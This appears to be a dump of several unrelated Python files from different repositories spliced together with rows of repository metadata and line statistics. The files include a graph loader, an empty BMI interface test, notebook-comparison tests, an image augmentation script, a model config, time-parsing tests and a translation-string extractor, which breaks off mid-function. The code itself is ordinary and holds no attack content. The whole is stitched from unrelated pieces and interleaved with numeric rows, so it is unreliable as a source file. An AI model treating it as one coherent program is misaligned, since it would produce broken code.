from . import image
from . import container
from . import system
| 16.25 | 23 | 0.769231 | 9 | 65 | 5.555556 | 0.555556 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184615 | 65 | 3 | 24 | 21.666667 | 0.943396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
812b4e30304f24bb277705592e38799b83099f91
| 1,049 |
py
|
Python
|
LoadGraph.py
|
mahdi-zafarmand/SNA
|
a7188a2ceb63355183e470648f6ae4fa90a22faa
|
[
"MIT"
] | null | null | null |
LoadGraph.py
|
mahdi-zafarmand/SNA
|
a7188a2ceb63355183e470648f6ae4fa90a22faa
|
[
"MIT"
] | null | null | null |
LoadGraph.py
|
mahdi-zafarmand/SNA
|
a7188a2ceb63355183e470648f6ae4fa90a22faa
|
[
"MIT"
] | 1 |
2020-10-28T01:52:36.000Z
|
2020-10-28T01:52:36.000Z
|
import networkx as nx
import os.path
def load_graph(path, weighted=False, delimiter='\t', self_loop=False):
graph = nx.Graph()
if not os.path.isfile(path):
print("Error: file " + path + " not found!")
exit(-1)
with open(path) as file:
for line in file.readlines():
w = 1.0
line = line.split(delimiter)
v1 = int(line[0])
v2 = int(line[1])
graph.add_node(v1)
graph.add_node(v2)
if weighted:
w = float(line[2])
if (self_loop and v1 == v2) or (v1 != v2):
graph.add_edge(v1, v2, weight=w)
return graph
def load_graph_uncertain(path, delimiter='\t', self_loop=False):
graph = nx.Graph()
if not os.path.isfile(path):
print("Error: file " + path + " not found!")
exit(-1)
with open(path) as file:
for line in file.readlines():
line = line.split(delimiter)
v1 = int(line[0])
v2 = int(line[1])
graph.add_node(v1)
graph.add_node(v2)
w = float(line[2])
p = float(line[3])
if (self_loop and v1 == v2) or (v1 != v2):
graph.add_edge(v1, v2, weight=w, prob=p)
return graph
| 20.98 | 70 | 0.625357 | 177 | 1,049 | 3.632768 | 0.276836 | 0.07465 | 0.07465 | 0.055988 | 0.755832 | 0.755832 | 0.755832 | 0.755832 | 0.755832 | 0.755832 | 0 | 0.037485 | 0.21163 | 1,049 | 49 | 71 | 21.408163 | 0.740024 | 0 | 0 | 0.756757 | 0 | 0 | 0.047664 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.054054 | 0 | 0.162162 | 0.054054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
8137ad04173c8650a7a1905ad7cd6c799cdbd81c
| 39 |
py
|
Python
|
pymutual/__init__.py
|
kimballh/pymutual
|
7d7f588099eee7bdd669d613756509c6ab44a911
|
[
"MIT"
] | null | null | null |
pymutual/__init__.py
|
kimballh/pymutual
|
7d7f588099eee7bdd669d613756509c6ab44a911
|
[
"MIT"
] | null | null | null |
pymutual/__init__.py
|
kimballh/pymutual
|
7d7f588099eee7bdd669d613756509c6ab44a911
|
[
"MIT"
] | null | null | null |
from .session import Session, MutualAPI
| 39 | 39 | 0.846154 | 5 | 39 | 6.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.942857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
d4bad788e453eaffecc4387f4afebe5f25e9867c
| 2,447 |
py
|
Python
|
tests/test_bmipy.py
|
visr/bmi-python
|
0fcca448d097bc001f7492094ce1fd95d041b81d
|
[
"MIT"
] | 14 |
2015-01-13T16:26:12.000Z
|
2021-07-22T04:56:59.000Z
|
tests/test_bmipy.py
|
visr/bmi-python
|
0fcca448d097bc001f7492094ce1fd95d041b81d
|
[
"MIT"
] | 11 |
2015-03-17T21:15:57.000Z
|
2021-03-24T21:31:00.000Z
|
tests/test_bmipy.py
|
visr/bmi-python
|
0fcca448d097bc001f7492094ce1fd95d041b81d
|
[
"MIT"
] | 9 |
2015-03-13T15:59:52.000Z
|
2021-06-28T11:40:51.000Z
|
import pytest
from bmipy import Bmi
class EmptyBmi(Bmi):
def __init__(self):
pass
def initialize(self, config_file):
pass
def update(self):
pass
def update_until(self, then):
pass
def finalize(self):
pass
def get_var_type(self, var_name):
pass
def get_var_units(self, var_name):
pass
def get_var_nbytes(self, var_name):
pass
def get_var_itemsize(self, name):
pass
def get_var_location(self, name):
pass
def get_var_grid(self, var_name):
pass
def get_grid_rank(self, grid_id):
pass
def get_grid_size(self, grid_id):
pass
def get_value_ptr(self, var_name):
pass
def get_value(self, var_name):
pass
def get_value_at_indices(self, var_name, indices):
pass
def set_value(self, var_name, src):
pass
def set_value_at_indices(self, var_name, src, indices):
pass
def get_component_name(self):
pass
def get_input_item_count(self):
pass
def get_output_item_count(self):
pass
def get_input_var_names(self):
pass
def get_output_var_names(self):
pass
def get_grid_shape(self, grid_id):
pass
def get_grid_spacing(self, grid_id):
pass
def get_grid_origin(self, grid_id):
pass
def get_grid_type(self, grid_id):
pass
def get_start_time(self):
pass
def get_end_time(self):
pass
def get_current_time(self):
pass
def get_time_step(self):
pass
def get_time_units(self):
pass
def get_grid_edge_count(self, grid):
pass
def get_grid_edge_nodes(self, grid, edge_nodes):
pass
def get_grid_face_count(self, grid):
pass
def get_grid_face_nodes(self, grid, face_nodes):
pass
def get_grid_face_edges(self, grid, face_edges):
pass
def get_grid_node_count(self, grid):
pass
def get_grid_nodes_per_face(self, grid, nodes_per_face):
pass
def get_grid_x(self, grid, x):
pass
def get_grid_y(self, grid, y):
pass
def get_grid_z(self, grid, z):
pass
def test_bmi_not_implemented():
class MyBmi(Bmi):
pass
with pytest.raises(TypeError):
Bmi()
def test_bmi_implemented():
assert isinstance(EmptyBmi(), Bmi)
| 16.993056 | 60 | 0.608909 | 347 | 2,447 | 3.956772 | 0.195965 | 0.21413 | 0.254916 | 0.163146 | 0.532411 | 0.426074 | 0.219228 | 0 | 0 | 0 | 0 | 0 | 0.313854 | 2,447 | 143 | 61 | 17.111888 | 0.817749 | 0 | 0 | 0.457447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010638 | 1 | 0.468085 | false | 0.457447 | 0.021277 | 0 | 0.510638 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 |
0
| 6 |
d4d2b1d5851dc6a58371dc3c355389cf9d7d425c
| 179 |
py
|
Python
|
test3_05.py
|
yoojunwoong/python_review01
|
9bb34f4ef75f951cd090fa623728c9542e7c7c27
|
[
"Apache-2.0"
] | null | null | null |
test3_05.py
|
yoojunwoong/python_review01
|
9bb34f4ef75f951cd090fa623728c9542e7c7c27
|
[
"Apache-2.0"
] | null | null | null |
test3_05.py
|
yoojunwoong/python_review01
|
9bb34f4ef75f951cd090fa623728c9542e7c7c27
|
[
"Apache-2.0"
] | null | null | null |
# for문에서 continue 사용하기, continue = skip개념!!!
for i in range(1,11):
if i == 6:
continue;
print(i);
print(i);
print(i);
print(i);
print(i);
| 17.9 | 45 | 0.49162 | 25 | 179 | 3.52 | 0.52 | 0.340909 | 0.5 | 0.545455 | 0.340909 | 0.340909 | 0.340909 | 0.340909 | 0 | 0 | 0 | 0.034188 | 0.346369 | 179 | 9 | 46 | 19.888889 | 0.717949 | 0.234637 | 0 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.625 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0
| 6 |
d4d56609e653c9ccb3c77b86d7440eff8168b7af
| 89 |
py
|
Python
|
root/converter/__init__.py
|
thasmarinho/root-image-editor
|
0c3e955a1f81be02fef9a488b2b45a44cf16930a
|
[
"MIT"
] | 2 |
2020-08-01T02:51:48.000Z
|
2021-11-22T11:58:40.000Z
|
root/converter/__init__.py
|
thasmarinho/root-image-editor
|
0c3e955a1f81be02fef9a488b2b45a44cf16930a
|
[
"MIT"
] | 4 |
2019-10-30T14:14:46.000Z
|
2022-03-11T23:57:52.000Z
|
root/converter/__init__.py
|
thasmarinho/root-image-editor
|
0c3e955a1f81be02fef9a488b2b45a44cf16930a
|
[
"MIT"
] | 1 |
2021-02-21T12:18:05.000Z
|
2021-02-21T12:18:05.000Z
|
from .color_converter import ColorConverter
from .scale_converter import ScaleConverter
| 22.25 | 43 | 0.876404 | 10 | 89 | 7.6 | 0.7 | 0.394737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101124 | 89 | 3 | 44 | 29.666667 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
d4f37664ce2a24dbc73824c236ef48b007de021a
| 6,681 |
py
|
Python
|
tests/test_compare.py
|
fool65c/jupytext
|
4b55d2e6ccc995c04679de0863234c60c3741a69
|
[
"MIT"
] | 1 |
2019-05-06T07:39:15.000Z
|
2019-05-06T07:39:15.000Z
|
tests/test_compare.py
|
royalosyin/jupytext
|
72aa6c4968da714323fbd7a7c548ee4b1274c946
|
[
"MIT"
] | null | null | null |
tests/test_compare.py
|
royalosyin/jupytext
|
72aa6c4968da714323fbd7a7c548ee4b1274c946
|
[
"MIT"
] | null | null | null |
import pytest
from nbformat.v4.nbbase import new_notebook, new_markdown_cell, new_code_cell, new_raw_cell
from jupytext.compare import compare_notebooks, NotebookDifference, test_round_trip_conversion as round_trip_conversion
def test_raise_on_different_metadata():
ref = new_notebook(metadata={'kernelspec': {'language': 'python', 'name': 'python', 'display_name': 'Python'}},
cells=[new_markdown_cell('Cell one')])
test = new_notebook(metadata={'kernelspec': {'language': 'R', 'name': 'R', 'display_name': 'R'}},
cells=[new_markdown_cell('Cell one')])
with pytest.raises(NotebookDifference):
compare_notebooks(ref, test, 'md')
@pytest.mark.parametrize('raise_on_first_difference', [True, False])
def test_raise_on_different_cell_type(raise_on_first_difference):
ref = new_notebook(cells=[new_markdown_cell('Cell one'), new_code_cell('Cell two')])
test = new_notebook(cells=[new_markdown_cell('Cell one'), new_raw_cell('Cell two')])
with pytest.raises(NotebookDifference):
compare_notebooks(ref, test, 'md', raise_on_first_difference=raise_on_first_difference)
@pytest.mark.parametrize('raise_on_first_difference', [True, False])
def test_raise_on_different_cell_content(raise_on_first_difference):
ref = new_notebook(cells=[new_markdown_cell('Cell one'), new_code_cell('Cell two')])
test = new_notebook(cells=[new_markdown_cell('Cell one'), new_code_cell('Modified cell two')])
with pytest.raises(NotebookDifference):
compare_notebooks(ref, test, 'md', raise_on_first_difference=raise_on_first_difference)
def test_raise_on_incomplete_markdown_cell():
ref = new_notebook(cells=[new_markdown_cell('Cell one\n\n\nsecond line')])
test = new_notebook(cells=[new_markdown_cell('Cell one')])
with pytest.raises(NotebookDifference):
compare_notebooks(ref, test, 'md')
def test_does_raise_on_split_markdown_cell():
ref = new_notebook(cells=[new_markdown_cell('Cell one\n\n\nsecond line')])
test = new_notebook(cells=[new_markdown_cell('Cell one'),
new_markdown_cell('second line')])
with pytest.raises(NotebookDifference):
compare_notebooks(ref, test, 'md')
def test_raise_on_different_cell_metadata():
ref = new_notebook(cells=[new_code_cell('1+1')])
test = new_notebook(cells=[new_code_cell('1+1', metadata={'metakey': 'value'})])
with pytest.raises(NotebookDifference):
compare_notebooks(ref, test, 'py:light')
@pytest.mark.parametrize('raise_on_first_difference', [True, False])
def test_raise_on_different_cell_count(raise_on_first_difference):
ref = new_notebook(cells=[new_code_cell('1')])
test = new_notebook(cells=[new_code_cell('1'),
new_code_cell('2')])
with pytest.raises(NotebookDifference):
compare_notebooks(ref, test, 'py:light', raise_on_first_difference=raise_on_first_difference)
with pytest.raises(NotebookDifference):
compare_notebooks(test, ref, 'py:light', raise_on_first_difference=raise_on_first_difference)
def test_does_not_raise_on_blank_line_removed():
ref = new_notebook(cells=[new_code_cell('1+1\n ')])
test = new_notebook(cells=[new_code_cell('1+1')])
compare_notebooks(ref, test, 'py:light')
def test_strict_raise_on_blank_line_removed():
ref = new_notebook(cells=[new_code_cell('1+1\n')])
test = new_notebook(cells=[new_code_cell('1+1')])
with pytest.raises(NotebookDifference):
compare_notebooks(ref, test, 'py:light', allow_expected_differences=False)
def test_dont_raise_on_different_outputs():
ref = new_notebook(cells=[new_code_cell('1+1')])
test = new_notebook(cells=[new_code_cell('1+1', outputs=[
{
"data": {
"text/plain": [
"2"
]
},
"execution_count": 1,
"metadata": {},
"output_type": "execute_result"
}
])])
compare_notebooks(ref, test, 'md')
@pytest.mark.parametrize('raise_on_first_difference', [True, False])
def test_raise_on_different_outputs(raise_on_first_difference):
ref = new_notebook(cells=[new_code_cell('1+1')])
test = new_notebook(cells=[new_code_cell('1+1', outputs=[
{
"data": {
"text/plain": [
"2"
]
},
"execution_count": 1,
"metadata": {},
"output_type": "execute_result"
}
])])
with pytest.raises(NotebookDifference):
compare_notebooks(ref, test, 'md', compare_outputs=True, raise_on_first_difference=raise_on_first_difference)
def test_test_round_trip_conversion():
notebook = new_notebook(cells=[new_code_cell('1+1', outputs=[
{
"data": {
"text/plain": [
"2"
]
},
"execution_count": 1,
"metadata": {},
"output_type": "execute_result"
}
])], metadata={'main_language': 'python'})
round_trip_conversion(notebook, {'extension': '.py'}, update=True)
def test_mutiple_cells_differ():
nb1 = new_notebook(cells=[new_code_cell(''),
new_code_cell('2')])
nb2 = new_notebook(cells=[new_code_cell('1+1'),
new_code_cell('2\n2')])
with pytest.raises(NotebookDifference) as exception_info:
compare_notebooks(nb1, nb2, raise_on_first_difference=False)
assert 'Cells 1,2 differ' in exception_info.value.args[0]
def test_cell_metadata_differ():
nb1 = new_notebook(cells=[new_code_cell('1'),
new_code_cell('2', metadata={'additional': 'metadata1'})])
nb2 = new_notebook(cells=[new_code_cell('1'),
new_code_cell('2', metadata={'additional': 'metadata2'})])
with pytest.raises(NotebookDifference) as exception_info:
compare_notebooks(nb1, nb2, raise_on_first_difference=False)
assert "Cell metadata 'additional' differ" in exception_info.value.args[0]
def test_notebook_metadata_differ():
nb1 = new_notebook(cells=[new_code_cell('1'),
new_code_cell('2')])
nb2 = new_notebook(cells=[new_code_cell('1'),
new_code_cell('2')],
metadata={'kernelspec': {'language': 'python', 'name': 'python', 'display_name': 'Python'}})
with pytest.raises(NotebookDifference) as exception_info:
compare_notebooks(nb1, nb2, raise_on_first_difference=False, )
assert "Notebook metadata differ" in exception_info.value.args[0]
| 41.75625 | 119 | 0.658135 | 822 | 6,681 | 4.989051 | 0.115572 | 0.054621 | 0.080468 | 0.125091 | 0.841258 | 0.821019 | 0.790051 | 0.782492 | 0.77347 | 0.712753 | 0 | 0.012128 | 0.210148 | 6,681 | 159 | 120 | 42.018868 | 0.765018 | 0 | 0 | 0.543307 | 0 | 0 | 0.129322 | 0.014968 | 0 | 0 | 0 | 0 | 0.023622 | 1 | 0.11811 | false | 0 | 0.023622 | 0 | 0.141732 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
be1f1730e3c83173cbfa65bc65d2316eb598bfbe
| 4,127 |
py
|
Python
|
delete.py
|
lvwuyunlifan/crop
|
7392d007a8271ff384c5c66ed5717afbc4172b4d
|
[
"Apache-2.0"
] | null | null | null |
delete.py
|
lvwuyunlifan/crop
|
7392d007a8271ff384c5c66ed5717afbc4172b4d
|
[
"Apache-2.0"
] | null | null | null |
delete.py
|
lvwuyunlifan/crop
|
7392d007a8271ff384c5c66ed5717afbc4172b4d
|
[
"Apache-2.0"
] | null | null | null |
import os
from PIL import Image, ImageFilter
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
# import seaborn as sns
import pandas as pd
import numpy as np
import random
train_path = './AgriculturalDisease_trainingset/'
valid_path = './AgriculturalDisease_validationset/'
def genImage(gpath, datatype):
if datatype == 'train':
gen_number = 0 # 统计生成的图片数量
if not os.path.exists(gpath+'delete'):
os.makedirs(gpath+'delete')
label = pd.read_csv(gpath + 'label.csv')
label_gen_dict = {'img_path':[], 'label':[]} # 生成图片label
for i in range(61):
li = label[label['label'] == i]
imagenum = li['label'].count()
print('第%d个,总共有有%d个图片'%(i, imagenum))
imagelist = np.array(li['img_path']).tolist()
img_path_gen, label_gen = [], []
# for imagefile in imagelist:
for aa in range(len(imagelist)):
if aa <= 40:
print(aa)
path, imagename = os.path.split(imagelist[aa])
im = Image.open(imagelist[aa])
im = im.convert('RGB')
im_detail = im.transpose(Image.ROTATE_180)
# im_detail = im.filter(ImageFilter.DETAIL) # 细节增强
img_path_gen.append(gpath + 'delete/' +'idetail_'+imagename)
label_gen.extend([int(i)])
im_detail.save(gpath + 'delete/' +'idetail_'+imagename)
gen_number += 1
label_dict = {'img_path':img_path_gen, 'label':label_gen}
label_gen_dict['img_path'].extend(img_path_gen)
label_gen_dict['label'].extend(label_gen)
label_gen_pd = pd.DataFrame(label_dict)
# label = label.append(label_gen_pd) # 将生成的图片label加入原先的label
# label['label'] = label[['label']].astype('int64') # 转化为int64
# print(label)
label_gen_p = pd.DataFrame(label_gen_dict)
label_gen_p.to_csv(gpath + 'label_delete.csv', index=False)
# label_gen_p = pd.DataFrame(label_gen_dict)
# label_gen_p.to_csv(gpath + 'label_gen.csv', index=False)
print('训练集总共生成%d个图片'%gen_number)
if datatype == 'valid':
gen_number = 0
if not os.path.exists(gpath+'delete'):
os.makedirs(gpath+'delete')
label = pd.read_csv(gpath + 'label.csv')
label_gen_dict = {'img_path':[], 'label':[]}
for i in range(61):
li = label[label['label'] == i]
imagenum = li['label'].count()
print('第%d个,总共有有%d个图片'%(i, imagenum))
imagelist = np.array(li['img_path']).tolist()
img_path_gen, label_gen = [], []
# for imagefile in imagelist:
for aa in range(len(imagelist)):
if aa <= 20:
print(aa)
path, imagename = os.path.split(imagelist[aa])
im = Image.open(imagelist[aa])
im = im.convert('RGB')
im_detail = im.transpose(Image.ROTATE_180)
#im_detail = im.filter(ImageFilter.DETAIL) # 细节增强
img_path_gen.append(gpath + 'delete/' + 'idetail_' + imagename)
label_gen.extend([int(i)])
im_detail.save(gpath + 'delete/' + 'idetail_' + imagename)
gen_number += 1
label_dict = {'img_path': img_path_gen, 'label': label_gen}
label_gen_dict['img_path'].extend(img_path_gen)
label_gen_dict['label'].extend(label_gen)
label_gen_pd = pd.DataFrame(label_dict)
# label = label.append(label_gen_pd) # 将生成的图片label加入原先的label
# label['label'] = label[['label']].astype('int64') # 转化为int64
# print(label)
label_gen_p = pd.DataFrame(label_gen_dict)
label_gen_p.to_csv(gpath + 'label_delete.csv', index=False)
print('验证集总共生成%d个图片'%gen_number)
if __name__ == '__main__':
genImage(train_path, 'train')
genImage(valid_path, 'valid')
| 35.886957 | 83 | 0.557063 | 483 | 4,127 | 4.52381 | 0.196687 | 0.102517 | 0.049428 | 0.04119 | 0.794508 | 0.794508 | 0.794508 | 0.794508 | 0.794508 | 0.794508 | 0 | 0.009184 | 0.31403 | 4,127 | 114 | 84 | 36.201754 | 0.762628 | 0.135692 | 0 | 0.739726 | 0 | 0 | 0.113963 | 0.019746 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013699 | false | 0 | 0.09589 | 0 | 0.109589 | 0.082192 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
07ab77d7eb12a86186be6ca7c7efa3f2eb65e7be
| 342 |
py
|
Python
|
configs/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_Pbr_16_36WoodBlock.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | 33 |
2021-12-15T07:11:47.000Z
|
2022-03-29T08:58:32.000Z
|
configs/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_Pbr_16_36WoodBlock.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | 3 |
2021-12-15T11:39:54.000Z
|
2022-03-29T07:24:23.000Z
|
configs/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_Pbr_16_36WoodBlock.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | null | null | null |
_base_ = "./FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_Pbr_01_02MasterChefCan.py"
OUTPUT_DIR = "output/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/16_36WoodBlock"
DATASETS = dict(TRAIN=("ycbv_036_wood_block_train_pbr",))
| 85.5 | 154 | 0.903509 | 45 | 342 | 6.155556 | 0.688889 | 0.079422 | 0.187726 | 0.267148 | 0.570397 | 0.570397 | 0.570397 | 0.570397 | 0.570397 | 0.570397 | 0 | 0.093093 | 0.026316 | 342 | 3 | 155 | 114 | 0.738739 | 0 | 0 | 0 | 0 | 0 | 0.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
07c22498468a49059683c71a90ec92358cf9e563
| 916 |
py
|
Python
|
tests/test_timeparser.py
|
vgoehler/python-i3-battery-block
|
e47ce80b315d812d731df84f2a1c8e1155b2469a
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_timeparser.py
|
vgoehler/python-i3-battery-block
|
e47ce80b315d812d731df84f2a1c8e1155b2469a
|
[
"BSD-2-Clause"
] | 9 |
2020-01-24T17:15:03.000Z
|
2020-06-02T14:16:40.000Z
|
tests/test_timeparser.py
|
vgoehler/python-i3-battery-block
|
e47ce80b315d812d731df84f2a1c8e1155b2469a
|
[
"BSD-2-Clause"
] | null | null | null |
from datetime import time
import pytest
from i3_battery_block_vgg.timeparser import __parse_time_manually
from i3_battery_block_vgg.timeparser import parse_time
@pytest.mark.parametrize(
"time_input, expected",
[
("12:13", time(hour=12, minute=13)),
("12:13:14", time(hour=12, minute=13, second=14)),
('00:54:00', time(hour=0, minute=54, second=0))
]
)
def test_manually_time_parsing(time_input: str, expected: time):
assert __parse_time_manually(time_input) == expected, "manual time parsing has gone wrong"
@pytest.mark.parametrize(
"time_input, expected",
[
("12:13", time(hour=12, minute=13)),
("12:13:14", time(hour=12, minute=13, second=14)),
('00:54:00', time(hour=0, minute=54, second=0))
]
)
def test_time_parsing(time_input: str, expected: time):
assert parse_time(time_input) == expected, "time parsing has gone wrong"
| 29.548387 | 94 | 0.677948 | 134 | 916 | 4.432836 | 0.253731 | 0.090909 | 0.114478 | 0.107744 | 0.835017 | 0.757576 | 0.757576 | 0.757576 | 0.757576 | 0.602694 | 0 | 0.082337 | 0.177948 | 916 | 30 | 95 | 30.533333 | 0.706507 | 0 | 0 | 0.416667 | 0 | 0 | 0.156114 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
ed7af640d287226ceb10c1b2fceda155d15712f4
| 7,426 |
py
|
Python
|
updatetranslations.py
|
erincerys/ergo
|
0aeedcdcccb5348d8eedb5faa6a0536d93ca3ae3
|
[
"MIT"
] | 1,122 |
2017-06-15T05:44:52.000Z
|
2021-05-26T16:27:43.000Z
|
updatetranslations.py
|
erincerys/ergo
|
0aeedcdcccb5348d8eedb5faa6a0536d93ca3ae3
|
[
"MIT"
] | 1,031 |
2017-06-18T13:57:51.000Z
|
2021-05-26T19:51:37.000Z
|
updatetranslations.py
|
erincerys/ergo
|
0aeedcdcccb5348d8eedb5faa6a0536d93ca3ae3
|
[
"MIT"
] | 113 |
2017-06-21T18:32:53.000Z
|
2021-05-26T13:12:46.000Z
|
#!/usr/bin/env python3
# updatetranslations.py
#
# tl;dr this script updates our translation file with the newest, coolest strings we've added!
# it manually searches the source code, extracts strings and then updates the language files.
# Written in 2018 by Daniel Oaks <daniel@danieloaks.net>
#
# To the extent possible under law, the author(s) have dedicated all copyright
# and related and neighboring rights to this software to the public domain
# worldwide. This software is distributed without any warranty.
#
# You should have received a copy of the CC0 Public Domain Dedication along
# with this software. If not, see
# <http://creativecommons.org/publicdomain/zero/1.0/>.
"""updatetranslations.py
Usage:
updatetranslations.py run <irc-dir> <languages-dir>
updatetranslations.py --version
updatetranslations.py (-h | --help)
Options:
<irc-dir> Oragono's irc subdirectory where the Go code is kept.
<languages-dir> Languages directory."""
import os
import re
import json
from docopt import docopt
import yaml
ignored_strings = [
'none', 'saset'
]
if __name__ == '__main__':
arguments = docopt(__doc__, version="0.1.0")
if arguments['run']:
# general IRC strings
irc_strings = []
for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
for fname in files:
filepath = subdir + os.sep + fname
if filepath.endswith('.go'):
content = open(filepath, 'r', encoding='UTF-8').read()
matches = re.findall(r'\.t\("((?:[^"]|\\")+)"\)', content)
for match in matches:
if match not in irc_strings:
irc_strings.append(match)
matches = re.findall(r'\.t\(\`([^\`]+)\`\)', content)
for match in matches:
if match not in irc_strings:
irc_strings.append(match)
for s in ignored_strings:
try:
irc_strings.remove(s)
except ValueError:
# ignore any that don't exist
...
print("irc strings:", len(irc_strings))
with open(os.path.join(arguments['<languages-dir>'], 'example', 'irc.lang.json'), 'w') as f:
f.write(json.dumps({k:k for k in irc_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
f.write('\n')
for string in irc_strings:
if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
print(' confirm:', string)
# help entries
help_strings = []
for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
for fname in files:
filepath = subdir + os.sep + fname
if fname == 'help.go':
content = open(filepath, 'r', encoding='UTF-8').read()
matches = re.findall(r'\`([^\`]+)\`', content)
for match in matches:
if '\n' in match and match not in help_strings:
help_strings.append(match)
for s in ignored_strings:
try:
help_strings.remove(s)
except ValueError:
# ignore any that don't exist
...
print("help strings:", len(help_strings))
